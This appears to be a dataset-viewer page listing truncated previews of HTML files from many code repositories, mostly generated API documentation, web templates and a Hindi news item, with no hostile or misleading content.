doc/skat09/test/class-use/ControllerTest.html | BuZZ-dEE/skat09 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_11) on Wed Jul 15 12:43:51 CEST 2009 -->
<TITLE>
Uses of Class de.uniluebeck.skat09.test.ControllerTest
</TITLE>
<LINK REL ="stylesheet" TYPE="text... |
nodejs/js/hello/index.html | antkillerfarm/antkillerfarm_crazy | <html>
<head>
<script src="../../common/jquery.min.js"></script>
</head>
<body>
<p id="aa"></p>
<p id="bb">Robin Li</p>
<p id="cc">Jobs</p>
<script src="hello.js"></script>
</body>
</html> |
message/67960.html | monitoringartist/community.zenoss.org | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>
Throttling of alerts - Open Source Network Monitoring and Systems Management
</t... |
phonostats/templates/phonostats/form.html | mmcauliffe/django-phonological-statistics | {% extends "phonostats/index.html" %}
{% block content %}
<form method="POST" action="">{% csrf_token %}
<table>
{{ form.as_table }}
</table>
<input type="submit" name="submit" value="Submit" id="submit">
</form>
{% endblock content %}
|
assets/public/ajax/demo-one-page-agency-ajax-load-more.html | desarrollosimagos/lubricar-web | <li class="isotope-item col-sm-6 col-md-3 website p-none">
<div class="image-gallery-item mb-none">
<a href="img/projects/project-6.jpg" class="lightbox-portfolio">
<span class="thumb-info thumb-info-centered-info thumb-info-no-borders custom-thumb-info-style-1">
<span class="thumb-info-wrapper">
... |
resources/Xalan/xalan-j_2.7.1-bin/docs/apidocs/org/apache/xalan/xslt/package-summary.html | doughtnerd/POD | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Thu Nov 22 16:43:32 EST 2007 -->
<TITLE>
Xalan-Java 2.7.1: Package org.apache.xalan.xslt
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="wh... |
Res/mnq/index.html | moyubing0514/AgeTool | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>上古... |
build/gr36/docs/doxygen/html/page_metadata.html | aviralchandra/Sandhi | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>GNU Radio 3.6.4.2 C... |
prive/formulaires/configurer_reducteur.html | RadioCanut/site-radiocanut | <div class="formulaire_spip formulaire_configurer formulaire_#FORM formulaire_#FORM-#ENV{id,nouveau}">
<h3 class='titrem'><img src="#CHEMIN_IMAGE{image-24.png}" class="cadre-icone" /><:info_generation_miniatures_images:></h3>
[<p class="reponse_formulaire reponse_formulaire_ok">(#ENV*{message_ok})</p>]
[<p class="rep... |
www/template/xhtml/sample/clone_sample.html | open-lims/open-lims | <!-- CONTAINER BEGIN ("Clone Sample") -->
[[CONTENT]]
<!-- CONTAINER END () --> |
chrome and opera/src/options/options.html | saipranav/extrasafe | <!--
/*******************************************************************************************
Just Remember one Master Password text, Extrasafe takes care of the rest ;)
Extrasafe (C) 2014-2015 The Extra Labs
GNU General Public License v3
http://theextralabs.com
****************************************************... |
jdk8en_us/docs/api/javax/swing/plaf/basic/class-use/BasicFileChooserUI.ApproveSelectionAction.html | DeanAaron/jdk8 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_11) on Mon Jun 16 17:36:07 PDT 2014 -->
<title>Uses of Class javax.swing.plaf.basic.BasicFileChooserUI.ApproveSelectionAction (Java Platform SE... |
src/main/java/org/dhcp4java/package.html | bubblecloud/dhcp4java | <BODY>
This package provides classes for manipulating DHCP Packets: creating, parsing and sending.
It is suitable for DHCP client, servers, relays or analysis. It currently supports only IPv4.
<p><tt>DHCPPacket</tt> is the central class allowing manipulation of DHCP packets.
A generic framework for DHCP servers is als... |
doc/html/classInfiniteLight.html | DMJC/mg2modeller- | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
_source/news/2017-12-13-modi.html | InstantKhabar/_source | ---
title: "मनमोहन सरकार ने उद्योगपतियों पर लुटाया जनता का पैसा: मोदी"
layout: item
category: ["india"]
date: 2017-12-13T08:11:02.878Z
image: 1513172462877modi.jpg
---
<p>नई दिल्ली: औद्योगिक संगठन फिक्की के सालाना बैठक में प्रधानमंत्री नरेंद्र मोदी ने पिछली यूपीए सरकार पर जमकर हमला बोला. उन्होंने कहा कि पिछली सरकारों न... |
docs/com/example/ehsueh/appygolucky/class-use/AddRequest.html | erichsueh/CMPUT301F16T03-D01 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_112-release) on Mon Nov 14 14:27:49 MST 2016 -->
<title>Uses of Class com.example.ehsueh.appygolucky.AddRequestActivity</title>
<meta name="dat... |
platform/linux/support/cmake/doc/cmake/html/variable/CMAKE_FIND_PACKAGE_NO_SYSTEM_PACKAGE_REGISTRY.html | libcrosswind/libcrosswind |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<titl... |
documentation/doxygen/globals_defs.html | areaDetector/ffmpegServer | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<title>ffmpegServer: Class Members</title>
<link href="tabs.css" rel="styleshe... |
www/templates/offerCar.html | arnaucode/carsincommonApp | <ion-view view-title="{{'Offer_Car' | translate}}">
<ion-content>
<div class="padding">
<label class="item item-input">
<span class="input-label">{{'Title' | translate}}</span>
<input type="text" ng-model="newtravel.title">
</label>
<div layout="row">
... |
themes/wefight/layouts/shortcodes/card.html | vladfr/wefightwithcards | {{ $name := .Get 0 }}
<strong class="game-card" data-html="true" data-toggle="popover" data-placement="right"
data-content="<img src='/cards/{{with .Get 1}}{{lower .}}/{{end}}{{ lower $name }}.png' class='{{with .Get 1}}{{.}}-{{end}}card' />"
>{{ $name }}</strong>
|
Guia_CSS.html | Oyler/testWIL | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="keywords" content="itam, wil, desarrollo web, web, desarrollo, css, guia css"/>
<meta name="description" content="Material CSS del WIL"/>
<meta name="author" content="Ismael... |
docs/class_modelface.html | sebbekarlsson/NINAGE-Engine | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
templates/energy/range.html | brunogirin/nhtg12 | {% if min and max %}
{{ min }} to {{ max }}
{% elif min %}
{{ min }}
{% elif max %}
{{ max }}
{% else %}
-
{% endif %}
|
dependencies/boost-1.46.0/doc/html/boost_asio/reference/basic_stream_socket/cancel/overload2.html | gorkinovich/DefendersOfMankind | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_stream_socket::cancel (2 of 2 overloads)</title>
<link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" hre... |
dependencies/boost-1.46.0/doc/html/boost_asio/reference/buffered_read_stream/fill.html | gorkinovich/DefendersOfMankind | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>buffered_read_stream::fill</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../boost_asio.... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.